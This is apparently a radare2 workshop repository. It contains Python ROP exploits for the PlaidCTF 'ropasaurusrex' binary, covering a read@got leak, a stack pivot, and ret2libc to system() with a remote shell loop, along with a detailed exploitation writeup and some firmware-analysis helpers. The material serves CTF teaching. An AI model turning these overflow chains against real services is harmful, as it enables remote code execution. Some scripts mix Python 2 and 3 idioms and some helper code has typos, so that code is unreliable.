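# libc build: the leak only reveals read()'s runtime address, and the
# differences (read - system, read - exit) are applied to it. The original
# script defined a 'vm' set (presumably paired with the commented-out
# 192.168.1.148 target) and then silently overwrote it with the 'local'
# set; both are kept here and the active one is chosen explicitly.
GLIBC_OFFSETS = {
    'vm': {'read': 0xd9d00, 'system': 0x3e2c0, 'exit': 0x310b0},
    'local': {'read': 0xdb1b0, 'system': 0x3e770, 'exit': 0x314a0},
}
LIBC = 'local'  # the set the original script ended up using


def libc_addresses(leaked_read, offsets):
    """Return (system, exit) runtime addresses derived from a leaked read()."""
    system_addr = leaked_read - (offsets['read'] - offsets['system'])
    exit_addr = leaked_read - (offsets['read'] - offsets['exit'])
    return system_addr, exit_addr


def main(cmd, host='127.0.0.1', port=2323, offsets=GLIBC_OFFSETS[LIBC]):
    """Leak read@got, compute system()/exit(), then run `cmd` on the target.

    `host` defaults to localhost; the workshop VM target (192.168.1.148)
    presumably goes together with the 'vm' offset set.
    """
    if not isinstance(cmd, bytes):
        cmd = cmd.encode()
    s = socket.create_connection((host, port))
    try:
        print('[+] Sending stage1 (leak)')
        # 140 bytes reach the saved return address (0x88-byte buffer + saved
        # EBP, see notes.md). Chain: write(1, &read@got, 4), then return into
        # the vulnerable function so it can be overflowed a second time.
        s.sendall(b'A' * 140 + rop(
            writeplt,
            pop3ret,
            1,          # stdout
            read_got,
            4,          # sizeof(void*) on x86_32

            vuln_func,  # return to the vulnerable function
        ))

        # receive leaked address of read
        leaked_got = struct.unpack('<I', recv_exact(s, 4))[0]
        print('[*] GOT at 0x%08x' % leaked_got)

        # compute system() and exit() from the leaked address and the offsets
        system_addr, exit_addr = libc_addresses(leaked_got, offsets)
        print("[*] system(2) at 0x%08x" % system_addr)
        print("[*] exit(2) at 0x%08x" % exit_addr)

        # second stage ROP payload
        print('[+] Sending stage2 (call)')
        # read(0, write_addr, 512) stores the command, then system(write_addr)
        # runs it with exit() as its return address.
        s.sendall(b'A' * 140 + rop(
            readplt,      # read(2)
            pop3ret,
            0,            # stdin
            write_addr,   # where to write
            512,

            system_addr,  # call system
            exit_addr,    # system()'s return address
            write_addr,   # system()'s argument: the command read above
        ))

        print('[+] sending stage3 (payload)')
        s.sendall(cmd + b'\0')  # must fit in the 512 bytes read() accepts

        print('[+] Reading the result')
        # Raw bytes: print() would mangle them on Python 3. A single recv()
        # may return only part of a long reply, as in the original.
        out = getattr(sys.stdout, 'buffer', sys.stdout)
        out.write(s.recv(9999))
    finally:
        s.close()


if __name__ == '__main__':
    main(sys.argv[1] if len(sys.argv) == 2 else 'id')
# --------------------------------------------------------------------------------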
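/demos/Exploit/ropasaurus/exploit2.py:
--------------------------------------------------------------------------------
import socket
import struct
import sys

# radare2 exploitation workshop
# (loosely based on work from Eindbazen and Crowell)
#
# Single-shot variant of exploit1.py: the first overflow leaks read@got,
# reads the second stage into a writable area and pivots the stack there,
# so the vulnerable function is never re-entered.


def rop(*args):
    """Pack 32-bit words into a little-endian ROP chain.

    '<' pins byte order and word size; the original bare 'I' depended on the
    host's native layout.
    """
    return struct.pack('<' + 'I' * len(args), *args)


def recv_exact(sock, n):
    """Read exactly n bytes; raise EOFError if the peer closes first.

    A short recv() would otherwise surface as a confusing struct.error.
    """
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise EOFError('peer closed after %d of %d bytes' % (len(buf), n))
        buf += chunk
    return buf


# Fixed addresses in the non-PIE ropasaurusrex binary (see notes.md).
readplt = 0x804832c
writeplt = 0x804830c
read_got = 0x0804961c
vuln_func = 0x080483F4
write_addr = 0x08049524  # where we're going to write: fake stack + command

# gadgets
pop3ret = 0x080484b6    # pop; pop; pop; ret
popebpret = 0x080484e8  # pop ebp; ret
leaveret = 0x080482ea   # leave; ret  (mov esp, ebp; pop ebp; ret)

# glibc offsets: specific to one libc build. The original listed a 'vm' set
# and silently overwrote it with the 'local' set; both kept, one selected.
GLIBC_OFFSETS = {
    'vm': {'read': 0xd9d00, 'system': 0x3e2c0},
    'local': {'read': 0xdb1b0, 'system': 0x3e770, 'exit': 0x314a0},
}
LIBC = 'local'

STAGE2_SLOTS = 4  # dwords in the fake stack before the command string


def stage2(system_addr, cmd, base=write_addr):
    """Build the fake stack the pivot lands on, followed by the command.

    After `pop ebp; ret` (ebp = base) and `leave; ret`, esp points at base:
    the first dword is popped into ebp (junk), the second is where ret goes
    (system), the third is system()'s return address (junk: execution
    crashes there after the command ran, which does not matter) and the
    fourth is system()'s argument -- the NUL-terminated command placed right
    after these four slots, hence base + 4*4.
    """
    if not isinstance(cmd, bytes):
        cmd = cmd.encode()
    return rop(
        0x42424242,               # new value of ebp, we don't care
        system_addr,              # call system
        0x43434343,               # system()'s return address, we don't care
        base + 4 * STAGE2_SLOTS,  # &cmd: skip the four slots above
    ) + cmd + b'\0'


def main(cmd, host='127.0.0.1', port=2323, offsets=GLIBC_OFFSETS[LIBC]):
    """Leak read@got, then pivot into a stage-2 stack that calls system(cmd)."""
    s = socket.create_connection((host, port))
    try:
        print('[+] Sending stage1 (leak + write payload)')
        s.sendall(b'A' * 140 + rop(
            writeplt,
            pop3ret,
            1,           # stdout
            read_got,
            4,           # size of a pointer

            readplt,     # read(2)
            pop3ret,
            0,           # stdin
            write_addr,  # where to write
            512,

            # This may seem convoluted, but it simply continues execution
            # with esp pointing at write_addr: a classic stack pivot.
            popebpret,
            write_addr,
            leaveret,    # mov esp, ebp ; pop ebp ; ret -- a function epilogue
        ))

        # receive leaked address of read
        leaked_got = struct.unpack('<I', recv_exact(s, 4))[0]
        print('[*] GOT at 0x%08x' % leaked_got)

        # calculate address of system using the leaked offset
        system_addr = leaked_got - (offsets['read'] - offsets['system'])
        print("[*] system(2) at 0x%08x" % system_addr)

        # second stage ROP payload (must fit the 512 bytes read() accepts)
        print('[+] Sending stage2 (call)')
        s.sendall(stage2(system_addr, cmd))

        print('[+] Reading the result')
        # Raw bytes: print() would mangle them on Python 3.
        out = getattr(sys.stdout, 'buffer', sys.stdout)
        out.write(s.recv(9999))
    finally:
        s.close()


if __name__ == '__main__':
    main(sys.argv[1] if len(sys.argv) == 2 else 'ls')
--------------------------------------------------------------------------------
/demos/Exploit/ropasaurus/exploit3.py:
--------------------------------------------------------------------------------
import socket
import struct
import sys

# radare2 exploitation workshop
# (loosely based on work from Eindbazen and Crowell)
#
# ret2libc variant: leak read@got, then return into system("/bin/sh") using
# the "/bin/sh" string that lives inside libc itself.


def rop(*args):
    """Pack 32-bit words into a little-endian ROP chain for the x86-32 target."""
    return struct.pack('<' + 'I' * len(args), *args)


# Fixed addresses in the non-PIE ropasaurusrex binary (see notes.md).
readplt = 0x804832c
writeplt = 0x804830c
read_got = 0x0804961c
vuln_func = 0x080483F4
write_addr = 0x08049524  # where we're going to write (unused in this variant)
pop3ret = 0x080484b6

# glibc offsets: specific to one libc build. The original listed a 'vm' set
# and silently overwrote it with the 'local' set; both kept, one selected.
# (The 'vm' set carries no "/bin/sh" offset, so it cannot be used as-is.)
GLIBC_OFFSETS = {
    'vm': {'read': 0xd9d00, 'system': 0x3e2c0, 'exit': 0x310b0},
    'local': {'read': 0xdb1b0, 'system': 0x3e770, 'binsh': 0x1602c4},
}
_libc = GLIBC_OFFSETS['local']

system_offset = _libc['read'] - _libc['system']
binsh_offset = _libc['read'] - _libc['binsh']

s = socket.create_connection(('127.0.0.1', 2323))

print('[+] Sending stage1 (leak)')
# 140 bytes reach the saved return address; write(1, &read@got, 4) leaks
# read()'s libc address, then we re-enter the vulnerable function.
s.sendall(b'A' * 140 + rop(
    writeplt,
    pop3ret,
    1,          # stdout
    read_got,
    4,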
# size of a pointer 42 | 43 | # return to the vulnerable function 44 | vuln_func 45 | )) 46 | 47 | 48 | # receive leaked address of read 49 | leaked_got = struct.unpack('I', s.recv(4))[0] 50 | print('[*] GOT at 0x%08x' % leaked_got) 51 | 52 | # calculate address of system using the leaked offset 53 | system = leaked_got - system_offset 54 | print("[*] system(2) at 0x%08x" % system) 55 | 56 | binsh = leaked_got - binsh_offset 57 | print("[*] /bin/sh at 0x%08x" % binsh) 58 | 59 | # second stage ROP payload 60 | print('[+] Sending stage2 (call)') 61 | s.send('A'*140 + rop( 62 | system, 63 | 0x41414141, 64 | binsh 65 | )) 66 | 67 | while(True): 68 | s.send(raw_input('$ ') + '\n') 69 | print(s.recv(1024)) 70 | -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/notes.md: -------------------------------------------------------------------------------- 1 | This is a detailled writeup of the [Ropsaraurus Rex]() challenge 2 | from PlaidCTF 2013, that was used during the [hack.lu](https://2014.hack.lu) 3 | workshop about [radare2]( http://rada.re ). 4 | 5 | I'd like to thank [Eindbazen]( http://eindbazen.net/2013/05/pctf-2013-ropasaurus-pwn-200/ ) 6 | and [crowell]() for their help. I'm not a pro at [ROP]( https://en.wikipedia.org/wiki/Return-oriented_programming), 7 | and wanted be sure that I could answer every questions during the workshop. 8 | Every errors are mine, not their. 9 | 10 | The goal is not to write as quick as possible a working exploit, 11 | nor to explain what ROP is, but rather to show how radare2 can 12 | be used to craft some cool things. 13 | 14 | As always, you should get the latest radare2 version from [git]( https://github.com/radare/radare2 ) 15 | 16 | ``` 17 | $ git clone https://github.com/radare/radare2 18 | $ ./sys/install.sh 19 | ``` 20 | 21 | # Preliminary analysis 22 | Open up the ropasaurusrex binary in r2 with the `-A` option, to tell it 23 | to analyse the binary. 
We can get the list every functions with `afl`. 24 | 25 | ``` 26 | $ r2 -A ./ropasaurusrex 27 | [0x08048340]> afl 28 | 0x08048340 34 1 entry0 29 | 0x0804831c 6 1 sym.imp.__libc_start_main 30 | 0x08048322 10 1 fcn.08048322 31 | 0x080482f8 10 1 fcn.080482f8 32 | 0x08048302 10 1 fcn.08048302 33 | 0x0804830c 6 1 sym.imp.write 34 | 0x08048312 10 1 fcn.08048312 35 | 0x0804832c 6 1 sym.imp.read 36 | 0x08048332 10 1 fcn.08048332 37 | 0x0804833c 38 1 fcn.0804833c 38 | 0x08048370 85 5 fcn.08048370 39 | 0x080483c5 46 4 fcn.080483c5 40 | 0x080483f4 41 2 fcn.080483f3 41 | 0x0804841d 44 1 main 42 | 0x08048450 5 2 fcn.08048449 43 | 0x08048455 101 3 fcn.08048455 44 | 0x080484ba 4 1 fcn.080484ba 45 | 0x080484c0 42 3 fcn.080484c0 46 | 0x080484ec 28 2 fcn.080484ea 47 | 0x08048508 21 1 section..rodata 48 | [0x08048340]> 49 | ``` 50 | 51 | Not that much, cool. Let's disassemble the main function: 52 | 53 | ``` 54 | [0x08048340]> pdf @ main 55 | │ ; DATA XREF from 0x08048357 (entry0) 56 | ╒ (fcn) main 44 57 | │ 0x0804841d 55 push ebp 58 | │ 0x0804841e 89e5 mov ebp, esp 59 | │ 0x08048420 83e4f0 and esp, 0xfffffff0 60 | │ 0x08048423 83ec10 sub esp, 0x10 61 | │ 0x08048426 e8c9ffffff call fcn.080483f3 62 | │ fcn.080483f3(unk) 63 | │ 0x0804842b c7442408040. mov dword [esp+0x8], 0x4 64 | │ 0x08048433 c7442404108. mov dword [esp+0x4], str.WIN_n ; str.WIN_n 65 | │ 0x0804843b c7042401000. mov dword [esp], 0x1 66 | │ 0x08048442 e8c5feffff call sym.imp.write 67 | │ sym.imp.write() 68 | │ 0x08048447 c9 leave 69 | ╘ 0x08048448 c3 ret 70 | [0x08048340]> 71 | ``` 72 | 73 | The main function is really short, let's translate it into C. 74 | 75 | ``` 76 | int main() { 77 | fcn.0x80483f4(); 78 | sym.imp.write(stdout, str.WIN_n, 4); // write is fd, string, len 79 | } 80 | ``` 81 | 82 | So, the main function will call `fcn.0x80483f4()`, then print "WIN" and exit. 
83 | ``` 84 | [0x08048340]> pdf @ fcn.080483f3 85 | ; CALL XREF from 0x08048426 (unk) 86 | ╒ (fcn) fcn.080483f3 41 87 | │ 0x080483f4 55 push ebp 88 | │ 0x080483f5 89e5 mov ebp, esp 89 | │ 0x080483f7 81ec98000000 sub esp, 0x98 90 | │ 0x080483fd c7442408000. mov dword [esp+0x8], 0x100 91 | │ 0x08048405 8d8578ffffff lea eax, [ebp-0x88] 92 | │ 0x0804840b 89442404 mov [esp+0x4], eax 93 | │ 0x0804840f c7042400000. mov dword [esp], 0x0 94 | │ 0x08048416 e811ffffff call sym.imp.read 95 | │ sym.imp.read(unk) 96 | │ 0x0804841b c9 leave 97 | ╘ 0x0804841c c3 ret 98 | [0x08048340]> 99 | ``` 100 | 101 | Great, this function is also very simple. 102 | Let's reverse it too! 103 | 104 | ``` 105 | sub_0x80483f4() { 106 | char buf[0x88]; 107 | sym.imp.read(stdin, buffer, 0x100); 108 | } 109 | ``` 110 | 111 | It seems that 0x100 bytes are read, and put in an array of 0x88 elements. 112 | Smells like a classic buffer-overflow. 113 | 114 | # Mitigations 115 | Since Aleph One's article 116 | [Smashing The Stack For Fun And Profit]( http://phrack.org/issues/49/14.html#article ), 117 | operating system and compiler have implemented hardening measures to thwart 118 | exploitation, like [ASLR]( https://en.wikipedia.org/wiki/Address_space_layout_randomization ) 119 | thanks to [PIC]( https://en.wikipedia.org/wiki/Position-independent_code ), 120 | [NX/W^X/DEP]( https://en.wikipedia.org/wiki/NX_bit ), 121 | [RELRO]( https://isisblogs.poly.edu/2011/06/01/relro-relocation-read-only/ ), ... 
122 | 123 | `rabin2`, a tool from the radare2 suite, is able to detect those mitigations: 124 | ``` 125 | $ rabin2 -I ./ropasaurusrex 126 | file ./ropasaurusrex 127 | type EXEC (Executable file) 128 | pic false 129 | canary false 130 | nx true 131 | crypto false 132 | has_va true 133 | root elf 134 | class ELF32 135 | lang c 136 | arch x86 137 | bits 32 138 | machine Intel 80386 139 | os linux 140 | subsys linux 141 | endian little 142 | strip true 143 | static false 144 | linenum false 145 | lsyms false 146 | relocs false 147 | rpath NONE 148 | ``` 149 | 150 | We can see that the binary has NX enabled (`nx true`): the stack is not executable, so instead of injecting shellcode we have to reuse code that is already mapped, i.e. ROP (surprise!). It also has no stack canary (`canary false`), so overwriting the saved return address goes undetected. 151 | But on the bright side, it's not compiled as position-independent code (`pic false`, `type EXEC`): the binary, including its PLT and GOT, will always 152 | be mapped at the same address. ASLR therefore only randomizes libc and the stack. We can use the fixed GOT to leak one libc address; because libc is a single mapping, every other libc symbol sits at a known, 153 | build-specific distance from it, which is enough to defeat ASLR for this process. Note that this rabin2 version does not report RELRO; check it separately (e.g. `readelf -l` for a `GNU_RELRO` segment), because with full RELRO the GOT is read-only and bound at load time, which matters once you start choosing where to write. 154 | 155 | # Getting control of EIP 156 | We need to see how many bytes we need to throw at this binary 157 | to get control of EIP. 158 | 159 | We ported the [De Bruijn](https://en.wikipedia.org/wiki/De_Bruijn_sequence) 160 | pattern generator of [mona.py](http://redmine.corelan.be/projects/mona) to 161 | radare2 (and the ragg2 tool). 162 | 163 | Let's generate the pattern: 164 | 165 | ``` 166 | $ ragg2 -P 300 -r 167 | AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAZAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABZABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB 168 | ``` 169 | 170 | We can now run the binary within r2's debugger, and pass the aforementioned 171 | pattern: 172 | 173 | ``` 174 | $ r2 -d ./ropasaurusrex 175 | Process with PID 21534 started...
176 | PID = 21534 177 | r_debug_select: 21534 21534 178 | pid = 21534 tid = 21534 179 | [0xf77d80d0]> dc 180 | AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAZAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABZABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB% 181 | [+] signal 11 aka SIGSEGV received 182 | [0x41417641]> dr eip 183 | eip = 0x41417641 184 | [0x41417641]> woO 0x41417641 185 | 140 186 | [0x41417641]> 187 | 188 | ``` 189 | 190 | Ok, we overwrote EIP with the value "0x41417641", which corresponds 191 | to offset 140 in the pattern; we have to write 140 bytes of padding before our 192 | actual ropchain. That matches the disassembly: the buffer lives at `ebp-0x88` (136 bytes) and is followed by the 4-byte saved `ebp`, so the saved return address is at offset 140, and read's 0x100-byte limit leaves 116 bytes for the chain itself. 193 | 194 | # Thinking the ROP chain 195 | Remember that we have calls to the *read* and *write* functions from libc in our 196 | binary? Together they give us an arbitrary-read primitive (`write(1, addr, n)` leaks `n` bytes at `addr`) and an arbitrary-write primitive (`read(0, addr, n)` fills `addr` with `n` bytes we send), great! 197 | 198 | We're going to write a multi-stage payload: 199 | 1. Leak the libc address of read(2) (to derive the address of system(3)), and return to the vulnerable function 200 | 2. Read our command, and write it *somewhere* writable 201 | 3. Call system(3) on it 202 | 4. Actually send our command 203 | 204 | There is also a more elegant solution: instead of returning 205 | to the vulnerable function, we could simply stack pivot like this: 206 | 1. Leak the libc address of read(2) 207 | 2. Read our command and write it *somewhere* 208 | 3. Stack-pivot 209 | 4. Actually send our command 210 | 211 | We could also go the *Windows way*: 212 | 1. Leak the libc address of mprotect(2) 213 | 2. Read our shellcode 214 | 3. Call mprotect on the previously-written shellcode (the address passed to mprotect must be page-aligned) 215 | 4. Return to our shellcode 216 | 217 | I'll only detail the first method in this writeup, 218 | but you can find PoC for all of them at the end 219 | of this document.
220 | 221 | # Building the chain 222 | 223 | If you don't remember the addresses of the read(2)/write(2) stubs in the PLT, here they are: 224 | 225 | ``` 226 | [0xf77db0d0]> afl~imp.read 227 | 0x0804832c 6 1 sym.imp.read 228 | [0xf77db0d0]> afl~imp.write 229 | 0x0804830c 6 1 sym.imp.write 230 | ``` 231 | 232 | Now, we must get read's address in the GOT: 233 | ``` 234 | [0x08048340]> pdi 1 @ sym.imp.read 235 | 0x0804832c ff251c960408 jmp dword [0x804961c] 236 | [0x08048340]> 237 | ``` 238 | 239 | To leak a libc address we'll want to read from the GOT entry of a known libc 240 | function. We can see that read's GOT slot is at 0x804961c. One caveat: with lazy binding (the default unless the binary was linked with `BIND_NOW`), a GOT slot only holds the libc address once the dynamic linker has resolved that symbol. read has already been called by the vulnerable function, so its slot is filled; write has *not* been called yet when our chain runs (main only calls it after the vulnerable function returns), so leaking write@got at this point would hand back the PLT resolver stub inside the binary, not a libc address. 241 | write's prototype is: 242 | ``` 243 | ssize_t write(int fildes, const void *buf, size_t nbyte); 244 | ``` 245 | So something like this is what we want. 246 | ``` 247 | write(1 /*stdout*/, 0x804961c /*read@got*/, 4 /*bytes to write: one 32-bit pointer*/); 248 | ``` 249 | But then, how do we clean up the stack to go to our next function, which is to 250 | write our command? We need to pop the 3 arguments off the stack, and set the return 251 | address to read. So first, let's find how to pop off the stack. 252 | r2 has some great rop gadget search tools, so we need to find gadgets that do 253 | the following. 254 | ``` 255 | pop ? 256 | pop ? 257 | pop ? 258 | ret 259 | ``` 260 | Where `?` can be any register, we don't really care (as long as none of them is `esp`, which would move the stack pointer away from our chain). This cleans up the stack 261 | and gets us to the next return address. We can use the `/R` command for finding 262 | gadgets. 263 | ``` 264 | [0x08048440]> /R pop,pop,pop,ret 265 | ``` 266 | r2 gives us back a bunch of example gadgets. I see one here which looks nice. 267 | ``` 268 | 0x080484b6 5e pop esi 269 | 0x080484b7 5f pop edi 270 | 0x080484b8 5d pop ebp 271 | 0x080484b9 c3 ret 272 | ``` 273 | I'll refer to this as "pppr" for poppoppopret.
274 | So, stage 1 of our payload can look like this 275 | ``` 276 | STAGE 1 277 | --frame_1-- 278 | [write@plt] 279 | [pppr ] // return address 280 | [1 ] 281 | [read@got ] 282 | [4 ] 283 | --frame_2-- 284 | [?? ] 285 | ``` 286 | Next, we need to find a place to write the command string that system will run. 287 | We can use the read function to do that. read looks like this 288 | ``` 289 | ssize_t read(int fd, void *buf, size_t count); 290 | ``` 291 | So let's do 292 | ``` 293 | read(0 /*stdin*/, target, length of command); 294 | ``` 295 | We now need a place to read the string to. ELF has different sections, with 296 | different permissions. Some are read only, write only, execute only, or any 297 | combination of the three! rabin2 lets us see the sections and find the 298 | permissions and sizes of each, so we can tell where to write to. 299 | ![Imgur](http://i.imgur.com/YsU1Blx.png) 300 | Perfect! there are plenty of sections. Generally I like to write to the `.bss` 301 | section, but this is only size 8, which would limit our command. So let's pick 302 | the `.dynamic` section. It is size 208, and we can write to it. 303 | ``` 304 | idx=20 vaddr=0x08049530 paddr=0x00000530 sz=208 vsz=208 perm=-rw- name=.dynamic 305 | ``` 306 | We'll reuse the same pppr gadget, because read takes the same number of arguments as write. 307 | So now our rop chain can be built. A word of warning on this target, though: `.dynamic` is not dead data. On glibc the lazy resolver (`_dl_runtime_resolve` / `_dl_fixup`) fetches the symbol-table, string-table and relocation pointers from the binary's `.dynamic` entries, so any PLT stub that gets resolved *after* our command has overwritten them will crash. The chain below only survives because of its ordering: write@plt is resolved during stage 1 (before the overwrite), read@plt was already resolved by the original vulnerable call, and system is reached by absolute address, so nothing is bound lazily afterwards. Keep that order, or pick a writable region nothing else reads (e.g. a `.data` slot), if you rearrange the chain. 308 | I'll call 0x08049530 writeaddr, and len(cmd) the length of our command; we read len(cmd)+1 bytes so that the terminating NUL is included, since system(3) expects a C string. 309 | So this now leaks the libc address of read. Then calls read from stdin to a 310 | memory address that we can write to. Then we need to return to our vulnerable 311 | function to then execute the system address that we calculate.
312 | ``` 313 | STAGE 1 314 | --frame_1-- 315 | [write@plt] 316 | [pppr ] // return address 317 | [1 ] 318 | [read@got ] 319 | [4 ] 320 | --frame_2-- 321 | [vuln_func] 322 | 323 | STAGE2 324 | --frame_1-- 325 | [read@plt ] 326 | [pppr ] 327 | [0 ] 328 | [writeaddr ] 329 | [len(cmd)+1 ] 330 | ``` 331 | In my libc, we can find the addresses of read and system. Because we leak the 332 | libc address of read, we can compute where system is by doing the following 333 | math (ASLR shifts the whole libc mapping by one page-aligned delta, so the distance between two symbols inside it is constant for a given libc build). 334 | ``` 335 | offset = libc_read - libc_system 336 | sys_addr = leaked_read_addr - offset 337 | ``` 338 | Keep in mind that this offset is specific to the exact libc build: an exploit built against your local libc will not work against a target running a different one, so in a real engagement you would first identify the remote libc (the low 12 bits of the leaked address survive ASLR and make a good fingerprint) and take the offsets from that build. 339 | Let's see what libc we're using 340 | ``` 341 | $ r2 -d ropasaurusrex 342 | Process with PID 16952 started... 343 | PID = 16952 344 | r_debug_select: 16952 16952 345 | [0xf76fd0d0]> dcu entry0 346 | Continue until 0x08048340 347 | [0x08048340]> dm~libc 348 | [0x08048340]> 349 | ``` 350 | 351 | ``` 352 | $ r2 /lib/i386-linux-gnu/libc.so.6 353 | [0x00019be0]> is~name=system 354 | vaddr=0x00057450 paddr=0x00040100 ord=1443 fwd=NONE sz=56 bind=UNKNOWN type=FUNC name=system 355 | [0x00019be0]> is~name=read 356 | vaddr=0x000f2800 paddr=0x000db4b0 ord=950 fwd=NONE sz=125 bind=UNKNOWN type=FUNC name=read 357 | [0x00019be0]> 358 | ``` 359 | 360 | Or, picking out just the file offsets (paddr). Note that this shortcut only works because both symbols live in the same loadable segment, so vaddr and paddr differ by the same constant (0x17350 here) and the subtraction gives the same result either way; the offset that matters at runtime is the vaddr one: 361 | 362 | ``` 363 | $ r2 /lib/i386-linux-gnu/libc.so.6 364 | [0x00019be0]> is~name=system[1] 365 | paddr=0x00040100 366 | [0x00019be0]> is~name=read[1] 367 | paddr=0x000db4b0 368 | [0x00019be0]> 369 | ``` 370 | Now all that is left is to do the same stack smash, then call system. 371 | system looks like this 372 | ``` 373 | int system(const char *command); 374 | ``` 375 | So we just want 376 | ``` 377 | system(0x08049530 /*address of the string we wrote*/); 378 | ``` 379 | Then we're done!
380 | Let's see what our complete payload looks like: 381 | ``` 382 | STAGE 1 383 | --frame_1-- 384 | [write@plt] 385 | [pppr ] // return address 386 | [1 ] 387 | [read@got ] 388 | [4 ] 389 | --frame_2-- 390 | [vuln_func] 391 | 392 | STAGE2 393 | --frame_1-- 394 | [read@plt ] 395 | [pppr ] 396 | [0 ] 397 | [writeaddr ] 398 | [len(cmd)+1 399 | --frame_2-- 400 | [system ] 401 | [exit ] 402 | [writeaddr] 403 | 404 | STAGE3 405 | our shell payload 406 | ``` 407 | 408 | # Constructing a more complex ropchain 409 | Let's try something else: 410 | ``` 411 | $ r2 -d ./ropasaurusrex 412 | Process with PID 32702 started... 413 | PID = 32702 414 | r_debug_select: 32702 32702 415 | pid = 32702 tid = 32702 416 | [0xf77aa0d0]> dc 417 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB 418 | [+] signal 11 aka SIGSEGV received 419 | [0x42424242]> dr 420 | eip = 0x42424242 421 | oeax = 0xffffffff 422 | eax = 0x00000091 423 | ebx = 0xf777a000 424 | ecx = 0xffd174b0 425 | edx = 0x00000100 426 | esp = 0xffd17540 427 | ebp = 0x41414141 428 | esi = 0x00000000 429 | edi = 0x00000000 430 | eflags = 0x00010207 431 | [0x42424242]> pxw 12 @ ecx -1 432 | 0xffd174af 0x414141f7 0x41414141 0x41414141 .AAAAAAAAAAA 433 | ``` 434 | It seems that ecx points to the beginning of our buffer. 
435 | -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/original: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/ropasaurus/original -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Exploit/ropasaurus/patched -------------------------------------------------------------------------------- /demos/Exploit/ropasaurus/readgot.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | 4 | def rop(*args): 5 | return struct.pack('I'*len(args), *args) 6 | 7 | writeplt = 0x804830c 8 | read_got = 0x804961C 9 | 10 | for i in range(10): 11 | s = socket.create_connection(('192.168.1.46', 2323)) 12 | 13 | s.send('A'*140 + rop( 14 | writeplt, 15 | 0x41414141, 16 | 1, 17 | read_got, 18 | 4 19 | )) 20 | leaked_got = struct.unpack('I', s.recv(4))[0] 21 | print(hex(leaked_got)) 22 | s.close() 23 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/.gdb_history: -------------------------------------------------------------------------------- 1 | run -a arm -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 2 | bt 3 | q 4 | run -a arm -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 5 | bt 6 | q 7 | run -a arm -b 32 -d -D gdb -e io.va=true gdb://127.0.0.1:1234 8 | bt 9 | q 10 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/connect_r2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | r2 -a arm.gnu -b 32 -d -D gdb 
-e io.va=true gdb://127.0.0.1:1234 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/cortex_A8.idc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // define register name and description 4 | // then define access table mask 5 | // [0] - Secure privileged Read 6 | // [1] - Secure privileged Write 7 | // [2] - Nonsecure privileged Read 8 | // [3] - Nonsecure privileged Write 9 | // [4] - Secure User Read 10 | // [5] - Secure User Write 11 | // [6] - Nonsecure User Read 12 | // [7] - Nonsecure User Write 13 | 14 | struct { 15 | char* name; 16 | char* description; 17 | char access_mask; 18 | } CP_reg; 19 | 20 | #define CP15_MAIN_ID_REGISTER "" 21 | #define CP15_MAIN_ID_REGISTER_ACESS_MASK 0xFF 22 | #define CP15_CACHE_TYPE_REGISTER "" 23 | 24 | static char* cp15_reg_comment_parser(char* name, char* description, int access_mask) { 25 | auto i; 26 | auto mask_str; 27 | 28 | i = name + ": \n" + description + "\n" + mask_str; 29 | return i; 30 | } 31 | 32 | static System_Control_Coprocessor(void) { 33 | 34 | // Example: "MRC p15, 0, R0, c0, c0, 1" - Read Cache Type Register 35 | 36 | addr_begin = FirstSeg(); 37 | i = addr_bagin; 38 | while ( NextAddr(i) != BADADDR ) { 39 | if (((GetMnem(i) == "MRC") | (GetMnem(i) == "MCR")) & (GetOpnd(i, 0) == 0)) { 40 | Operand_1 = GetOpnd(i, 1); 41 | 42 | // Extracting "R0" register 43 | instr_register = substr(Operand_1, 0, 1); 44 | // Extracting first "c0" 45 | instr_coprocessor_register1 = substr(Operand_1, 3, 4); 46 | // Extracting second "c0" 47 | instr_coprocessor_register2 = substr(Operand_1, 6, 7); 48 | // Exracting operand parameter 49 | instr_operand_param = GetOpnd(i, 2); 50 | switch (instr_coprocessor_register1) { 51 | case "c0": 52 | switch (instr_coprocessor_register2) { 53 | case "c0": 54 | if (intr_operand_param == 0) { 55 | // this is an Read Main ID Register 56 | MakeComm(i, CP_MAIN_ID_REGISTER); 57 | 
